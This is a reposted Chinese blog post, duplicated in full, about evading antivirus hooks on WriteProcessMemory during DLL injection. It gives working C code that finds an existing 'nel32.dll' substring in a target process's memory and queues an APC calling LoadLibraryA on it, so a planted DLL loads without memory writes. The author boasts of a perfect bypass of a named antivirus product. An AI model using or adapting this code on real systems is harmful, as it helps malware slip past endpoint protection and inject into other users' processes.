主动防御的代码注入方法一点思考 (转载)
2011-01-13 13:21
465 查看
目前大多数的杀软都是hook NtWriteVirtualMemory和NtUserSetWindowsHookAW、NtUserSetWindowsHookE来防止代码注入。
关于代码注入Ring3层的方法主要有:
远程线程CreateRemoteThread
消息钩子SetWindowsHookEx
Ring3 APC QueueUserApc
修改线程上下文SetContextThread
其中第一种和第三种方法需要传入一个param,但是要求这个param必须在目标进程内存空间,之前的一些方法比较笨重,直接在目标进程 VirtualAllocEx内存,然后把希望的参数内容写入这个内存,使用了WriteProcessMemory函数,而这个函数是被hook的,所以杀软可以很容易的拦截代码注入行为。
仔细想想,杀软的这种防御是很失败的!原因是为了要一个param,攻击者完全没有必要做这么大的动作去目标进程内存空间申请内存并写内存,我在思考是否可以不用WriteProcessMemory函数呢?反正我的目的就是得到一个合理的param,并且这个param是在目标进程内存空间即可!
思考后,原来一切是这么容易啊,哈哈!乐了我半天~~~
举个例子:假设我是这样注入的:
QueueUserAPC((PAPCFUNC)LoadLibraryA, hThread, (ULONG_PTR)param) ;
我想让上面的param的内容是一个“xxx.dll”,就可以了,而且要求这个param是在目标进程内存空间
您想到了么?哈哈
答案:直接在目标进程搜索一个这样的字符串“nel32.dll”就可以啦!因为“kernel32.dll” 这样的字符串是一定存在的,那么为了和“kernel32.dll” 不一样,那就随便使用一下“nel32.dll”,或者“el32.dll”,都是可以的啊!最后在往windows目录下面撂进入一个 nel32.dll,这样注入大部分杀软都是不能拦截到的!哈哈!
写了段程序,做了个试验,仅测试了下趋势,完美绕过!其实杀软稍后测试。。。
DWORD EnumThreadandInjectDll(char *processName,HANDLE hProcess, DWORD dwProcessID,TIDLIST *pThreadIdList)
{
TIDLIST *pCurrentTid = pThreadIdList ;
const char szInjectModName[] = "nel32.dll";
DWORD dwLen = strlen(szInjectModName) ;
//////////////////////////////////////////////////////////////////////////
//不写目标进程的内存
//直接在目标进程中搜索出 nel32.dll 这样的字符串 并注入
//////////////////////////////////////////////////////////////////////////
int bufflen=30000;
char *buffer=(char *)malloc(sizeof(char)*bufflen);
DWORD dwNumberOfBytesRead;
DWORD defaultAddress;
//获得该进程的基址
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, dwProcessID) ;
if(!hSnapshot)
{
printf("CreateToolhelp32Snapshot error!/n");
return 0;
}
MODULEENTRY32 me = { sizeof(me) };
BOOL fOk =Module32First(hSnapshot,&me);
if(!fOk)
{
printf("Module32First error!/n");
return 0;
}
for (; fOk; fOk = Module32Next(hSnapshot,&me))
{
printf("%s process module name = %s/n",processName,me.szModule);
// 取得进程模块基址
if(stricmp(me.szModule,processName)==0)
{
defaultAddress=(DWORD)me.modBaseAddr;
printf("%s process module base = 0x%08X/n",processName,defaultAddress);
break;
}
}
//搜索
if(!ReadProcessMemory(hProcess,(LPCVOID)defaultAddress,buffer,bufflen,&dwNumberOfBytesRead))
{
printf("ReadProcessMemory error!/n");
return 0;
}
for(int i=0;i<bufflen-dwLen;i++)
{
if(strnicmp(buffer+i,szInjectModName,dwLen)==0)
{
printf("found nel32.dll already!... %s/n",buffer+i);
while (pCurrentTid)
{
HANDLE hThread = OpenThread(THREAD_ALL_ACCESS, FALSE, pCurrentTid->dwTid) ;
if (hThread != NULL)
{
//
// 注入DLL到指定进程
//
QueueUserAPC((PAPCFUNC)LoadLibraryA, hThread, (ULONG_PTR)(defaultAddress+i)) ;
}
printf("TID:%d/n", pCurrentTid->dwTid) ;
pCurrentTid = pCurrentTid->pNext ;
}
break;
}
}
return 0 ;
关于代码注入Ring3层的方法主要有:
远程线程CreateRemoteThread
消息钩子SetWindowsHookEx
Ring3 APC QueueUserApc
修改线程上下文SetContextThread
其中第一种和第三种方法需要传入一个param,但是要求这个param必须在目标进程内存空间,之前的一些方法比较笨重,直接在目标进程 VirtualAllocEx内存,然后把希望的参数内容写入这个内存,使用了WriteProcessMemory函数,而这个函数是被hook的,所以杀软可以很容易的拦截代码注入行为。
仔细想想,杀软的这种防御是很失败的!原因是为了要一个param,攻击者完全没有必要做这么大的动作去目标进程内存空间申请内存并写内存,我在思考是否可以不用WriteProcessMemory函数呢?反正我的目的就是得到一个合理的param,并且这个param是在目标进程内存空间即可!
思考后,原来一切是这么容易啊,哈哈!乐了我半天~~~
举个例子:假设我是这样注入的:
QueueUserAPC((PAPCFUNC)LoadLibraryA, hThread, (ULONG_PTR)param) ;
我想让上面的param的内容是一个“xxx.dll”,就可以了,而且要求这个param是在目标进程内存空间
您想到了么?哈哈
答案:直接在目标进程搜索一个这样的字符串“nel32.dll”就可以啦!因为“kernel32.dll” 这样的字符串是一定存在的,那么为了和“kernel32.dll” 不一样,那就随便使用一下“nel32.dll”,或者“el32.dll”,都是可以的啊!最后在往windows目录下面撂进入一个 nel32.dll,这样注入大部分杀软都是不能拦截到的!哈哈!
写了段程序,做了个试验,仅测试了下趋势,完美绕过!其实杀软稍后测试。。。
DWORD EnumThreadandInjectDll(char *processName,HANDLE hProcess, DWORD dwProcessID,TIDLIST *pThreadIdList)
{
TIDLIST *pCurrentTid = pThreadIdList ;
const char szInjectModName[] = "nel32.dll";
DWORD dwLen = strlen(szInjectModName) ;
//////////////////////////////////////////////////////////////////////////
//不写目标进程的内存
//直接在目标进程中搜索出 nel32.dll 这样的字符串 并注入
//////////////////////////////////////////////////////////////////////////
int bufflen=30000;
char *buffer=(char *)malloc(sizeof(char)*bufflen);
DWORD dwNumberOfBytesRead;
DWORD defaultAddress;
//获得该进程的基址
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, dwProcessID) ;
if(!hSnapshot)
{
printf("CreateToolhelp32Snapshot error!/n");
return 0;
}
MODULEENTRY32 me = { sizeof(me) };
BOOL fOk =Module32First(hSnapshot,&me);
if(!fOk)
{
printf("Module32First error!/n");
return 0;
}
for (; fOk; fOk = Module32Next(hSnapshot,&me))
{
printf("%s process module name = %s/n",processName,me.szModule);
// 取得进程模块基址
if(stricmp(me.szModule,processName)==0)
{
defaultAddress=(DWORD)me.modBaseAddr;
printf("%s process module base = 0x%08X/n",processName,defaultAddress);
break;
}
}
//搜索
if(!ReadProcessMemory(hProcess,(LPCVOID)defaultAddress,buffer,bufflen,&dwNumberOfBytesRead))
{
printf("ReadProcessMemory error!/n");
return 0;
}
for(int i=0;i<bufflen-dwLen;i++)
{
if(strnicmp(buffer+i,szInjectModName,dwLen)==0)
{
printf("found nel32.dll already!... %s/n",buffer+i);
while (pCurrentTid)
{
HANDLE hThread = OpenThread(THREAD_ALL_ACCESS, FALSE, pCurrentTid->dwTid) ;
if (hThread != NULL)
{
//
// 注入DLL到指定进程
//
QueueUserAPC((PAPCFUNC)LoadLibraryA, hThread, (ULONG_PTR)(defaultAddress+i)) ;
}
printf("TID:%d/n", pCurrentTid->dwTid) ;
pCurrentTid = pCurrentTid->pNext ;
}
break;
}
}
return 0 ;
相关文章推荐
- [VC] - 绕过主动防御的代码注入方法思考
- <转载>突破 Sql 防注入过滤程序继续注入的一点方法
- 转载(一)代码注入的三种方法
- 防止代码变质的思考与方法
- 向其他进程注入代码的三种方法(injectdll)
- 分析注入代码的两种方法
- 关于静态方法为什么不能被重写的一点思考以及overload的一些坑。
- vc++ 向其他进程注入代码的三种方法
- Java 中 Object.clone() 方法以及protected 的一点思考
- 如何获取C#中方法的执行时间以及其代码注入详解
- 向其他进程注入代码的三种方法
- golang不到30行代码实现依赖注入的方法
- 好久不写ios代码,生疏了,以前的一些方法竟然被启用了,网上着了文章转载
- 主动思考、独立思考:多想一点
- 数据库被注入 JS脚本 代码, 清除 方法
- git切换分支保存修改的代码的方法(转载)
- Linux 平台一种进程代码注入方法
- 绕过卡巴斯基主动防御系统方法的讨论
- 关于静态方法为什么不能被重写的一点思考以及overload的一些坑
- 带你开发一款给Apk中自己主动注入代码工具icodetools(开凿篇)